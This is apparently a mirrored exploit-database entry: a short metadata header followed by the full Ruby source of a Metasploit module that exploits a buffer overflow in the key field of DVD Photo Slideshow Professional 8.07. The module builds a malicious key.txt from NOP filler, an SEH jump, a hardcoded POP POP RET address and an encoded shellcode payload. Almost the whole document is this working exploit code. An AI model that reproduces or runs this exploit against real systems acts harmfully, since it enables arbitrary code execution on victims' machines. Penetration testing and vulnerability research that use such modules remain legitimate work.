DVD Photo Slideshow Professional 8.07 Key Buffer Overflow (Metasploit)
CVE:
Category: CWE-119
Price: Not specified
Severity: High
Author: Metasploit
Risk: High
Exploitation Type: Local
Date: 2020-10-15
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100089
Below is a copy:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info={})
    super(update_info(info,
      'Name'           => "DVD Photo Slideshow Professional 8.07 Key Buffer Overflow",
      'Description'    => %q{
        This module uses a buffer overflow in version 8.07 of DVD Photo Slideshow Professional.
        Create a specially designed TXT file, copy the characters located in the TXT file,
        paste them into the key field, then validate the key: the application suffers from
        a buffer overflow and overwrites EIP, allowing the shellcode to be executed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'T3jv1l - ZwX', # Exploit-DB POC
          'ZwX'           # Metasploit Module
        ],
      'References'     =>
        [
          [ 'EDB', '48041 - 45346' ],
          [ 'URL', 'https://www.exploit-db.com/exploits/48041' ],
          [ 'URL', 'https://cxsecurity.com/issue/WLB-2018090084' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows 10 x86 - Windows 7 x64',
            {
              'Ret' => 0x10014283 # POP POP RET [DVDPhotoData.dll]
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Feb 11 2020",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'Create malicious file key', 'key.txt'])
      ])
  end

  def exploit
    file_payload = payload.encoded

    # 1608 bytes of filler precede the SEH record
    msfsploit = make_fast_nops(1608)
    msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
    msfsploit << [target.ret].pack("V*") # SEH
    msfsploit << file_payload

    # Write the buffer to the file named by FILENAME
    file_create(msfsploit)
  end
end